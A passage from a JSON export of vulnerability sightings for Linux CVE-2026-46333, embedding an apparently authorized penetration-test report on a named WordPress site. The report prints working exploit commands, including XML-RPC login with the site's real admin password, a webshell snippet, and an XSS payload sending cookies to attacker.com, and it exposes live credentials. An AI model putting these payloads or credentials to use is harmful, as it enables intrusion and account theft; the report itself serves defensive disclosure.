\u0431\u0435\u0448\u0435 \u043e\u0442\u043a\u0440\u0438\u0442\u0430 \u043f\u043e\u0440\u0435\u0434\u043d\u0430 ...\n\n#IT #\u041d\u043e\u0432\u0438\u043d\u0438 #CVE-2026-46333 #Linux #\u043a\u0438\u0431\u0435\u0440\u0441\u0438\u0433\u0443\u0440\u043d\u043e\u0441\u0442 #\u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430 #\u0441\u0438\u0441\u0442\u0435\u043c\u0430 #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-23T14:52:39.620858Z"}, {"uuid": "e74b505d-fcf6-4927-a6e2-a65351e63646", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "https://t.me/thehackernews/9053", "content": "\ud83d\uded1 [New] 9-Year-Old Linux Kernel Bug = Local Root on Default Debian, Ubuntu &amp; Fedora.\n\nhttps://thehackernews.com/2026/05/9-year-old-linux-kernel-flaw-enables.html\n\nCVE-2026-46333 (ssh-keysign-pwn) lets any unprivileged user steal /etc/shadow + SSH host keys and run commands as root.\n\n\ud83d\udd38 Public PoC available\n\ud83d\udd38 Patch your kernel NOW\n\ud83d\udd38 Quick temp fix - sysctl kernel.yama.ptrace_scope=2", "creation_timestamp": "2026-05-21T07:42:55.000000Z"}, {"uuid": "fe44e392-9b51-4609-a500-97095b934691", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mmkwa6j64z2e", "content": "Top 3 CVE for last 7 days:\nCVE-2026-45584: 65 interactions\nCVE-2026-45250: 64 interactions\nCVE-2026-46333: 25 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-69: 18 interactions\nCVE-2026-20223: 3 interactions\nCVE-2026-41091: 3 interactions\n", "creation_timestamp": "2026-05-24T02:30:41.542652Z"}, {"uuid": "b8e8b39a-d166-45ff-970d-4307ec0f17f6", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/ehcgroup.bsky.social/post/3mmrl7opcy227", "content": "Escalamiento de privilegios local en el kernel de Linux, permite filtrar claves SSH y hashes de contrase\u00f1as.\n\nUna vulnerabilidad oculta por 9 a\u00f1os en el kernel (CVE-2026-46333) permite a usuarios locales sin privilegios robar claves SSH y hashes de contrase\u00f1as.\nwww.linkedin.com/pulse/escala...", "creation_timestamp": "2026-05-26T18:02:13.621197Z"}, {"uuid": "12c1e69a-f1ca-489e-bd8f-9a7591d142bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/nitrux.bsky.social/post/3mmmwz6fdfs2z", "content": "PSA: We've confirmed that the mitigation for CVE-2026-46333 (ssh-keysign-pwn) inadvertently prevents Wine and Proton from functioning, affecting game compatibility.\n\nBug Tracker ID: #230\n\nFor more information, check the PSA: nxos.org/psa/psa-nitr....\n\n#Nitrux #PSA", "creation_timestamp": "2026-05-24T21:50:01.105399Z"}, {"uuid": "474fa2fd-385a-4793-875a-8a5a7f23d911", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mmngpinxe52e", "content": "Top 3 CVE for last 7 days:\nCVE-2026-45250: 72 interactions\nCVE-2026-45584: 65 interactions\nCVE-2026-46333: 24 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-45250: 8 interactions\nCVE-2026-26980: 6 interactions\nCVE-2026-9082: 4 interactions\n", "creation_timestamp": "2026-05-25T02:30:54.891370Z"}, {"uuid": "a84496ba-4848-4152-939b-7a162423e56d", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mmuy3mednn24", "content": "Top 3 CVE for last 7 days:\nCVE-2026-45250: 72 interactions\nCVE-2026-46333: 18 interactions\nCVE-2026-69: 18 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-48095: 11 interactions\nCVE-2026-48710: 4 interactions\nCVE-2026-1933: 3 interactions\n", "creation_timestamp": "2026-05-28T02:30:32.722137Z"}, {"uuid": "bd6f372c-a933-4319-b6df-f755fb5034fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-46339", "type": "published-proof-of-concept", "source": "https://github.com/decolua/9router/security/advisories/GHSA-fhh6-4qxv-rpqj", "content": "", "creation_timestamp": "2026-05-13T13:15:48.000000Z"}, {"uuid": "5b0d1a64-f401-4c01-bf27-2836f795dd94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-46337", "type": "published-proof-of-concept", "source": "https://github.com/WWBN/AVideo/security/advisories/GHSA-w4qq-74h6-58wq", "content": "", "creation_timestamp": "2026-05-13T13:06:46.000000Z"}, {"uuid": "79ad1420-db93-4874-81c9-e43b3a07db9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/infosecbot.bsky.social/post/3mn44mnw76r23", "content": "While I wait for my agents to finish some work, a short post on the part of CVE-2026-46333 I find most interesting: Unix design bug. 
Imperfect analogies and cute/cringe images included.\n\nPrivileged Unix code\u2026\n\n\ud83d\udd01 RT @julianor | reposted by @thegrugq\nhttps://x.com/julianor/status/2060525982608404487", "creation_timestamp": "2026-05-30T22:40:18.244218Z"}, {"uuid": "66c5a367-abba-40d8-b6a4-079ff15ab46f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mmxikgplyz2a", "content": "Top 3 CVE for last 7 days:\nCVE-2026-69: 19 interactions\nCVE-2026-26980: 17 interactions\nCVE-2026-46333: 17 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-35616: 10 interactions\nCVE-2026-25592: 7 interactions\nCVE-2026-26030: 7 interactions\n", "creation_timestamp": "2026-05-29T02:30:29.678470Z"}, {"uuid": "444ba7b7-4582-480c-b06a-c8d013ca9e42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mnah5pk4as2d", "content": "\u201cSSH-KEYSIGN-PWN: THE 9-YEAR-OLD KERNEL BUG THAT CAN STEAL YOUR SHADOW FILE IN SECONDS\u201d +\u00a0Video\n\nIntroduction: A critical logic flaw has been discovered in the Linux kernel\u2019s process access control mechanism (`__ptrace_may_access()`), remaining hidden for nine years. 
Known as CVE-2026-46333 or\u2026", "creation_timestamp": "2026-06-01T15:59:27.031498Z"}, {"uuid": "5b0d16dc-fa52-4756-835d-2ae00998965b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/suse-linux-kernel-multiple-vulnerabilities_20260601", "content": "", "creation_timestamp": "2026-05-31T20:00:00.000000Z"}, {"uuid": "7b8007bb-994c-4358-a751-8528057ae090", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://t.me/P0x3k_1N73LL1G3NC3/361", "content": "ssh-keysign-pwn \u2014 CVE-2026-46333\n\nA critical race condition flaw in pre-31e62c2ebbfd Linux kernels. Due to a window during process exit where the memory management structure is cleared before file descriptors are closed, an unprivileged user can use pidfd_getfd(2) to steal open file descriptors of privileged processes, enabling unauthorized reading of root-owned files.\n\n\ud83d\udd17 Exploit:\nhttps://github.com/0xdeadbeefnetwork/ssh-keysign-pwn\n\n\ud83d\udd17 Source:\nhttps://blog.qualys.com/vulnerabilities-threat-research/2026/05/20/cve-2026-46333-local-root-privilege-escalation-and-credential-disclosure-in-the-linux-kernel-ptrace-path\n\n#linux #kernel #privesc #racecondition #pidfd", "creation_timestamp": "2026-06-01T14:36:08.000000Z"}, {"uuid": "8458c32c-792a-4942-a0e9-77648c16a43e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/flatcar.org/post/3mncldh6zk22o", "content": "\ud83d\udce6 Package updates: Linux 6.12.91 (Alpha/Beta/Stable), Linux 6.6.141 (LTS), ca-certificates 3.124\n\ud83d\udd12 Security maintenance release for the recently 
disclosed kernel LPEs Fragnesia (CVE-2026-46300) and ssh-keysign-pwn (CVE-2026-46333), plus the usual kernel CVE roll-up", "creation_timestamp": "2026-06-02T12:19:35.308404Z"}, {"uuid": "6040a891-d7d4-4894-8b8b-c8f7e658b76d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/linkersec.bsky.social/post/3mnfbcmoo7k2o", "content": "Logic bug in the Linux kernel's __ptrace_may_access() function (CVE-2026-46333)\n\nArticle about a logical bug in the ptrace implementation that allows getting access to file descriptors of other processes and thus escalating privileges in certain scenarios.\n\ncdn2.qualys.com/advisory/202...", "creation_timestamp": "2026-06-03T13:58:11.996211Z"}, {"uuid": "391e0d1c-56e8-46c8-bea0-366622c182df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://gist.github.com/C4sh3R/1f99346b1086e7d358ff1be8f5be7a42", "content": "Columtech \u2014 Security Audit Report \u00b7 c4sh3r\n\n\u258c Security Audit \u00b7 2026-06-03/04\n\nColumtech Online\nWeb Security Report\n\nFull security assessment of columtech.online. 
Result: full compromise \u2014 WordPress admin, RCE as www-data, defacement demonstrated, escalation to root blocked by exceptional hardening.\n\nTarget: columtech.online\nBackend: Apache 2.4.66 \u00b7 PHP 8.2.30 \u00b7 MySQL 8.0.45\nStack: WP 7.0 \u00b7 Elementor 4.0.2 \u00b7 Docker \u00b7 Cloudflare \u00b7 Caddy\nDate: 2026-06-03 / 04\n\nReport author \u00b7 c4sh3r \u00b7 audit requested by the domain owner \u00b7 full authorization\n\nExecutive Summary\n\nAn end-to-end security audit was performed on columtech.online, a WordPress portal operated by its owner for practice and learning purposes. The assessment covered passive reconnaissance, user enumeration, attack-surface analysis of plugins and XML-RPC, exploitation of weak credentials, post-exploitation as www-data inside a Docker container, a defacement demonstration, and an exhaustive exploration of privilege escalation to root.\n\nThe site was fully compromised at the application level: WordPress administrator access, remote code execution as www-data, file system read/write, and demonstrated defacement. 
Escalation to root inside the container was blocked by a hardening profile that combines seccomp, AppArmor and ptrace_scope=3, resisting all known public CVEs for kernel 6.8.\n\nIn addition, a real webshell from an external attacker was discovered (wp-loginizer.php \u2014 WSO Mr.X v2.5 with a beacon to cdn.privdayz.com), which requires immediate removal.\n\nMain risk: Weak administrator password marce:marce123 reachable via XML-RPC without rate limiting \u2192 full site compromise in minutes.\n\n3 Critical \u00b7 4 High \u00b7 4 Medium \u00b7 4 Low \u00b7 3 Informational\n\nDemonstrated Attack Chain\n\n1. REST API bypass (?rest_route=/wp/v2/users) \u2192 enum admin marce (id=1) + prueba (id=2) + columtech (id=3)\n\u2193\n2. Gravatar SHA-256 reverse \u2192 email for prueba: prueba@gmail.com\n\u2193\n3. XML-RPC wp.getUsersBlogs (credential oracle without rate limiting) \u2192 marce:marce123 [administrator]\n\u2193\n4. WP admin \u2192 REST API POST /wp/v2/plugins \u2192 installation of the code-snippets plugin\n\u2193\n5. Code Snippets PHP snippet \u2192 RCE as www-data \u00b7 uid=33 \u00b7 hostname 6c49a066ba4c\n\u2193\n6. Defacement: site title + sticky post + static page with matrix rain / glitch effects\n\u2193\n7. Escalation: 12 CVEs and techniques tested \u2192 blocked by seccomp + AppArmor + ptrace_scope=3\n\nScope and Methodology\n\nTarget: https://www.columtech.online \u2014 WordPress 7.0 + Elementor 4.0.2 + Filester/elFinder plugin\nType: Black box \u2192 grey box (after obtaining credentials) \u00b7 no prior server access\nAuthorization: Domain owned by the requester \u00b7 full audit authorized verbally\nIdentification: All requests tagged with User-Agent: c4sh3r and X-Bug-Bounty: c4sh3r\nNon-destructive: The defacement was demonstrated and reverted. Test files removed. No real site information was destroyed or deleted.\nTools: curl, Python 3, LinPEAS, bore (tunnel), GCC, git (exploit repos), real-time web search for CVEs\n\nSummary of Findings\n\nID | Severity | Finding | Component\nC-01 | Critical | Weak admin credential \u2014 full access via XML-RPC | WordPress \u00b7 XML-RPC\nC-02 | Critical | Pre-existing external webshell (WSO Mr.X) | wp-loginizer.php\nC-03 | Critical | RCE as www-data via the Code Snippets plugin | WordPress \u00b7 Code Snippets REST\nH-01 | High | XML-RPC exposed \u2014 SSRF + credential oracle without rate limiting | xmlrpc.php\nH-02 | High | CVE-2026-6127 Elementor stored XSS via REST API | Elementor 4.0.2 \u2264 4.0.4\nH-03 | High | User enumeration via 4 routes without rate limiting | REST API \u00b7 wp-login \u00b7 lostpassword\nH-04 | High | Plugin nonce exposed in REST without authentication | Filevue \u00b7 /wp/v2/pages/7\nM-01 | Medium | WordPress 7.0 / Elementor 4.0.2 \u2014 outdated versions | Core + plugins\nM-02 | Medium | User email deducible from Gravatar hash (SHA-256) | REST API \u00b7 Gravatar\nM-03 | Medium | Broken password recovery + user oracle | wp-login.php \u00b7 lostpassword\nM-04 | Medium | wp-cron.php publicly accessible | wp-cron.php\nL-01 | Low | Missing security headers (HSTS, X-Content-Type, Permissions-Policy) | HTTP Headers \u00b7 Caddy\nL-02 | Low | Apache origin/version leaked in 404 responses | Apache 2.4.66 \u00b7 Cloudflare bypass\nL-03 | Low | readme.html accessible \u2014 WP version disclosure | WordPress Core\nL-04 | Low | CVE-2026-24072 Apache 2.4.66 mod_rewrite htaccess read | Apache 2.4.66\nI-01 | Info | Docker container with effective seccomp/AppArmor hardening | Infrastructure\nI-02 | Info | DB creds in clear text in a container environment variable | Docker env \u00b7 WORDPRESS_DB_*\nI-03 | Info | Kernel 6.8.0-117 vulnerable to CVE-2026-46333 but blocked by seccomp | Kernel \u00b7 pidfd_getfd\n\nDetailed Findings\n\nC-01\nCritical\nWeak administrator credential \u2014 full compromise via XML-RPC\n\nDescription\nThe administrator account marce had the password marce123. XML-RPC does not implement rate limiting, which allowed the password to be discovered through a credential oracle in a few dozen attempts. Once authenticated, full access was obtained: reading site options, creating/editing posts, uploading files and installing plugins.\n\nPoC\n# Credential discovery via the XML-RPC oracle\ncurl -X POST https://www.columtech.online/xmlrpc.php \\\n  -d '<?xml version=\"1.0\"?><methodCall>\n       <methodName>wp.getUsersBlogs</methodName>\n       <params>\n         <param><value><string>marce</string></value></param>\n         <param><value><string>marce123</string></value></param>\n       </params></methodCall>'\n\n# Response: isAdmin=1, blogName=Laboratorio\n# RESULT: administrator access confirmed\n\nImpact\nFull access to the WordPress administration panel\nInstallation of arbitrary plugins \u2192 RCE\nRead/write access to all content and users\nSite defacement demonstrated\nFile upload to the server\n\nRemediation\n# 1. Change the password immediately (minimum 20 chars, random)\n# 2. Disable XML-RPC if Jetpack/the mobile app is not used\nadd_filter('xmlrpc_enabled', '__return_false');\n\n# 3. Alternatively, block it in Caddy/Cloudflare\n# Cloudflare WAF rule: (http.request.uri.path eq \"/xmlrpc.php\") \u2192 Block\n\nC-02\nCritical\nPre-existing external webshell \u2014 WSO Mr.X v2.5\n\nDescription\n/var/www/html/wp-loginizer.php (237 KB) was found: a fully functional WSO (\u00abWeb Shell by orb\u00bb) Mr.X BYPASS v2.5 webshell. The file includes a file manager with a terminal, a file editor, and a tracking beacon that reports the URL of each visit to https://cdn.privdayz.com/images/logo.jpg. The site was compromised by an external attacker before this audit (Russian-language spam posts since 2023).\n\nPoC\ncurl https://www.columtech.online/wp-loginizer.php\n# Responds with a full file manager (no additional authentication)\n# Contains: terminal, file editor, upload\n# BEACON: POST to cdn.privdayz.com with the visitor's location.href\n\nImpact\nAn external attacker has active shell access as www-data\nExfiltration of visitor data to a third-party server (privdayz.com)\nPossible pivoting to the database and files\nGDPR/privacy: the beacon tracks visitor IPs\n\nRemediation\n# URGENT \u2014 delete the file immediately\nrm /var/www/html/wp-loginizer.php\nrm /var/www/html/2ops.php     # additional file manager\nrm /var/www/html/x.php        # audit webshell (ours)\nrm /var/www/html/rs.php       # audit reverse shell (ours)\nrm /var/www/html/rs2.php      # audit reverse shell (ours)\n\n# Audit ALL files modified in the last 90 days:\nfind /var/www/html -newer /var/www/html/wp-config.php -name \"*.php\" | sort\n\nC-03\nCritical\nRCE as www-data via the Code Snippets REST API\n\nDescription\nWith administrator access, the Code Snippets plugin was installed via the authenticated REST API (POST /wp/v2/plugins). The plugin exposes a REST API that allows creating PHP snippets that run on every page load. A snippet containing a webshell (shell_exec(base64_decode($_GET['c4sh3r']))) was created, which executes arbitrary commands as uid=33(www-data).\n\nPoC\n# Install the plugin\ncurl -X POST https://columtech.online/index.php?rest_route=/wp/v2/plugins \\\n  -H \"X-WP-Nonce: $NONCE\" -H \"Cookie: $ADMIN_COOKIES\" \\\n  -d '{\"slug\":\"code-snippets\",\"status\":\"active\"}'\n\n# Create the webshell snippet\ncurl -X POST https://columtech.online/index.php?rest_route=/code-snippets/v1/snippets \\\n  -H \"X-WP-Nonce: $NONCE\" \\\n  -d '{\"code\":\"if(isset($_GET[\\\"c4sh3r\\\"])){die(shell_exec(base64_decode($_GET[\\\"c4sh3r\\\"])));}\", \"scope\":\"front-end\",\"active\":true}'\n\n# Run a command\ncurl \"https://columtech.online/?c4sh3r=$(echo -n 'id' | base64)\"\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n\nImpact\nRemote command execution on the server\nReading of wp-config.php and database credentials\nWrite access to /var/www/html (host filesystem)\nDefacement of the entire site\nInteractive reverse shell to the attacker demonstrated\n\nRemediation\n# Remove the Code Snippets plugin and the malicious snippet\n# Review and remove ALL non-essential plugins\n# Change the admin credentials FIRST (see C-01)\n# Implement a WAF rule to block ?c4sh3r= parameters\n\nH-01\n
High\nXML-RPC exposed \u2014 confirmed SSRF + credential-testing amplification\n\nDescription\nxmlrpc.php is enabled with system.multicall available. The pingback.ping method causes the server to make arbitrary outbound HTTP requests (SSRF). It was confirmed that the server attempts to reach 169.254.169.254 (cloud metadata) and can scan internal ports through timing differences.\n\nPoC\n# SSRF \u2014 the server fetches an attacker-controlled URL\ncurl -X POST https://columtech.online/xmlrpc.php \\\n  -d '<methodCall><methodName>pingback.ping</methodName>\n       <params>\n         <param><value><string>http://169.254.169.254/</string></value></param>\n         <param><value><string>https://columtech.online/?p=1</string></value></param>\n       </params></methodCall>'\n\n# Result: 11.3s timeout \u2192 the server reaches the metadata endpoint\n# External (example.com): 1.3s | Internal (localhost:80): 0.3s\n\nImpact\nSSRF: scanning of internal ports/services and cloud metadata\nsystem.multicall: credential-testing amplification without generating proportional logs\nPingback abuse: DDoS against third parties using the server as an amplifier\n\nRemediation\nadd_filter('xmlrpc_enabled', '__return_false');\n# Or block it in Cloudflare/Caddy if it is needed for Jetpack\n\nH-02\nHigh\nCVE-2026-6127 \u2014 Elementor 4.0.2 Stored XSS via REST API (form-encoded PATCH)\n\nDescription\nElementor 4.0.2 is vulnerable to CVE-2026-6127 (CVSS 6.4). The _elementor_data field is registered with show_in_rest without a sanitize_callback. 
An attacker with the Contributor+ role can send a form-encoded (non-JSON) PATCH request and the sanitization is skipped entirely, storing arbitrary JavaScript that runs for any visitor, including the administrator.\n\nPoC\ncurl -X PATCH https://columtech.online/index.php?rest_route=/wp/v2/posts/1 \\\n  -H \"Authorization: Basic $(echo -n 'contributor:pass' | base64)\" \\\n  -H \"Content-Type: application/x-www-form-urlencoded\" \\\n  --data-urlencode 'meta[_elementor_edit_mode]=builder' \\\n  --data-urlencode 'meta[_elementor_data]=[{\"elType\":\"widget\",\"widgetType\":\"html\",\"settings\":{\"html\":\"<svg/onload=fetch(\\\"//attacker.com/\\\"+document.cookie)>\"}}]'\n\nImpact\nPersistent XSS \u2192 theft of the administrator's session cookies\nAdministrator account takeover when they visit the page\nChain to defacement and RCE from XSS (auto-creating an admin via fetch)\n\nRemediation\n# Update Elementor to \u2265 4.0.5\n# Workaround: restrict the Contributor role to trusted users\n\nH-03\nHigh\nAdmin user enumeration via 4 routes without rate limiting\n\nDescription\nThe administrator's username (marce) can be obtained by at least 4 different methods, none of them protected by rate limiting or captcha:\n\nPoC\n# Method 1: REST API bypass of the Caddy filter\ncurl \"https://columtech.online/index.php?rest_route=/wp/v2/users\"\n# [{\"id\":1,\"slug\":\"marce\",...},{\"id\":2,\"slug\":\"prueba\",...}]\n\n# Method 2: author redirect\ncurl -I \"https://columtech.online/?author=1\"\n# 301 \u2192 /author/marce/\n\n# Method 3: wp-login oracle (different response depending on the user)\n# valid: \"la contrase\u00f1a que has introducido para marce no es correcta\"\n# invalid: \"El nombre de usuario nope123 no est\u00e1 registrado\"\n\n# Method 4: lostpassword oracle\n# valid: \"no se pudo enviar el correo electr\u00f3nico\" (the user DOES exist)\n# invalid: \"no hay ninguna cuenta con ese nombre de usuario\"\n\nRemediation\n# Restrict REST users to authenticated users:\nadd_filter('rest_endpoints', function($ep){\n    if(isset($ep['/wp/v2/users'])) unset($ep['/wp/v2/users']);\n    return $ep;\n});\n# Unify the wp-login and lostpassword error messages\n# Block the ?author= redirect\n\nH-04\nHigh\nFilevue plugin nonce exposed in the REST API without authentication\n\nDescription\nThe \u00abClient Portal\u00bb page (ID=7) contains the Filevue plugin's login form with a WordPress nonce (_wpnonce) embedded in the rendered HTML. This HTML is returned by the REST API GET /wp/v2/pages/7 without authentication, exposing the nonce to any attacker.\n\nPoC\ncurl \"https://columtech.online/index.php?rest_route=/wp/v2/pages/7\" | \\\n  grep -o '_wpnonce\" value=\"[^\"]*\"'\n# _wpnonce\" value=\"ecd04e0712\"\n\n# The nonce allows sending authenticated requests to admin-post.php\n# without being logged in \u2014 used to test for SQLi in filevue_client_login\n\nRemediation\n# Do not embed nonces in public REST content\n# Restrict /wp/v2/pages to authenticated users or exclude the Client Portal page\n# Generate the nonce on the client side (JS) after authentication\n\nM-01\nMedium\nOutdated versions \u2014 WordPress 7.0 / Elementor 4.0.2 / Apache 2.4.66\n\nDescription\nElementor 4.0.2 is vulnerable to CVE-2026-6127 (patched in 4.0.5). 
Apache 2.4.66 is vulnerable to CVE-2026-23918 (HTTP/2 RCE) and CVE-2026-24072 (read bypass via htaccess), both patched in 2.4.67. The generator meta tag exposes exact versions.\n\nRemediation\n# Update Elementor: wp plugin update elementor\n# Update Apache: apt-get upgrade apache2\n# Remove the generator meta tag:\nremove_action('wp_head', 'wp_generator');\n# Remove readme.html and license.txt from the webroot\n\nM-02\nMedium\nUser email deducible via reverse Gravatar SHA-256\n\nDescription\nGravatar avatar URLs include the SHA-256 hash of the user's normalized email. The email of the prueba account (prueba@gmail.com) was deduced by testing common candidates against the hash publicly exposed at GET /wp/v2/users/2.\n\nPoC\nimport hashlib\nhash_target = \"913ef45dd4e1f647359a846bca8bffb8d25b22f2a79d34d71c9c90ef0eb53024\"\nfor email in [\"prueba@gmail.com\", ...]:\n    if hashlib.sha256(email.encode()).hexdigest() == hash_target:\n        print(\"MATCH:\", email)\n# MATCH: prueba@gmail.com\n\nRemediation\n# Disable Gravatar in WordPress (use a local avatar)\n# Or use an email that is not predictable for sensitive accounts\n\nM-03\nMedium\nBroken password recovery + user oracle\n\nDescription\nThe password recovery form fails with the error \u00abno se pudo enviar el correo electr\u00f3nico\u00bb for valid users, and \u00abno hay ninguna cuenta\u00bb for nonexistent users. This acts as an enumeration oracle. 
In addition, the email is not sent, so the reset is inoperable \u2014 an availability impact and a possible host-header injection vector if SMTP is configured in the future.\n\nRemediation\n# 1. Configure SMTP (WP Mail SMTP or Mailgun)\n# 2. Unify the error message (do not reveal whether the user exists)\n# 3. Set siteurl and home in wp-config.php to prevent host-header injection\ndefine('WP_SITEURL', 'https://www.columtech.online');\ndefine('WP_HOME', 'https://www.columtech.online');\n\nM-04\nMedium\nwp-cron.php publicly accessible\n\nDescription\nwp-cron.php returns HTTP 200 and can be called externally. This allows server load to be amplified by calling it in a loop, acting as a DoS vector.\n\nRemediation\n# In wp-config.php:\ndefine('DISABLE_WP_CRON', true);\n# In the server crontab:\n*/5 * * * * curl -s https://www.columtech.online/wp-cron.php?doing_wp_cron=1 >/dev/null\n\nL-01\nLow\nMissing HTTP security headers\n\nDescription\nStrict-Transport-Security (HSTS), X-Content-Type-Options: nosniff and Permissions-Policy are missing. 
The CSP only covers frame-ancestors 'self'.\n\nRemediation\n# In Caddy (Caddyfile):\nheader Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\nheader X-Content-Type-Options \"nosniff\"\nheader Permissions-Policy \"geolocation=(), microphone=(), camera=()\"\n\nL-02\nLow\nApache origin and version disclosure in 404 pages\n\nDescription\nThe 404 pages generated by Apache reveal: Apache/2.4.66 (Debian) Server at www.columtech.online Port 80 \u2014 the exact version, the distribution, and that it listens on port 80 without TLS.\n\nRemediation\n# In apache2.conf:\nServerTokens Prod\nServerSignature Off\n\nL-03\nLow\nreadme.html accessible \u2014 WordPress version disclosure\n\nDescription\n/readme.html returns HTTP 200 and reveals the exact WordPress version. This facilitates targeting with version-specific CVEs.\n\nRemediation\nrm /var/www/html/readme.html /var/www/html/license.txt\n\nL-04\nLow\nCVE-2026-24072 Apache 2.4.66 \u2014 htaccess mod_rewrite file read\n\nDescription\nApache 2.4.66 is vulnerable to CVE-2026-24072: a user with write access to .htaccess can read files outside their directory with the privileges of the httpd process. 
In this case, www-data already has that access, but the vector is relevant in multi-user scenarios.\n\nRemediation\n# Update Apache to 2.4.67+\napt-get upgrade apache2\n\nI-01\nInfo\nDocker container hardening \u2014 seccomp + AppArmor + ptrace_scope=3\n\nDescription\nThe Docker container has an exceptional hardening profile that blocked all the privilege-escalation CVEs tested (12 different techniques). The AF_ALG, CLONE_NEWUSER, io_uring_setup and pidfd_getfd syscalls are blocked by seccomp. AppArmor docker-default blocks writes to system files. ptrace_scope=3 prevents all process inspection. This is the correct level of hardening for production workloads.\n\nCVEs tested and blocked\nCVE-2026-31431 (Copy Fail)     \u2192 AF_ALG blocked by seccomp\nCVE-2026-43284 (Dirty Frag)    \u2192 CLONE_NEWUSER blocked\nCVE-2026-46300 (Fragnesia)     \u2192 CLONE_NEWUSER blocked\nCVE-2026-46333 (ssh-keysign)   \u2192 pidfd_getfd blocked\nio_uring exploits              \u2192 io_uring_setup blocked\nGameOver(lay)                  \u2192 CLONE_NEWUSER blocked\nCrackArmor                     \u2192 AppArmor FS inaccessible in the container\nCVE-2026-27456 (mount TOCTOU)  \u2192 No /etc/fstab user,loop entries\ngpasswd shadow attack          \u2192 AppArmor blocks writes to /etc/gshadow\n\nI-02\nInfo\nDB credentials in clear text in the container's environment variables\n\nDescription\nThe MySQL credentials are accessible in clear text via /proc/self/environ to any process in the container (including www-data after RCE):\n
\nWORDPRESS_DB_HOST=wordpress_db:3306\nWORDPRESS_DB_USER=wp_user\nWORDPRESS_DB_PASSWORD=wp_password\nWORDPRESS_DB_NAME=wordpress\n\nRemediation\n# Use Docker secrets instead of env vars for credentials\n# Or mount an encrypted config file from a secrets manager\n\nI-03\nInfo\nKernel 6.8.0-117 vulnerable to CVE-2026-46333 (blocked by seccomp)\n\nDescription\nThe 6.8.0-117-generic kernel (built on 5 May 2026) predates the fix for CVE-2026-46333 (published on 14 May 2026). The vulnerability allows reading /etc/shadow through a race condition in __ptrace_may_access() + pidfd_getfd. The container's seccomp blocks the pidfd_getfd syscall (438), fully mitigating the exploit. It was verified that the public exploit failed with \u00abno hit in 500 rounds\u00bb.\n\nRemediation\n# Update the host kernel when the patch is available\n# The current seccomp profile already protects against this CVE\n\nRemediation Plan \u00b7 Priority\n\nTODAY (critical): Change the password for marce (minimum 20 chars). Remove wp-loginizer.php, 2ops.php and all audit files from the webroot. Disable XML-RPC. Remove the Code Snippets plugin and the malicious snippet.\n\nThis week: Update Elementor to \u2265 4.0.5 (patches CVE-2026-6127). Update Apache to 2.4.67 (patches CVE-2026-23918 and CVE-2026-24072). Audit all PHP files modified in the last 90 days. Configure SMTP and unify the wp-login error messages. Restrict 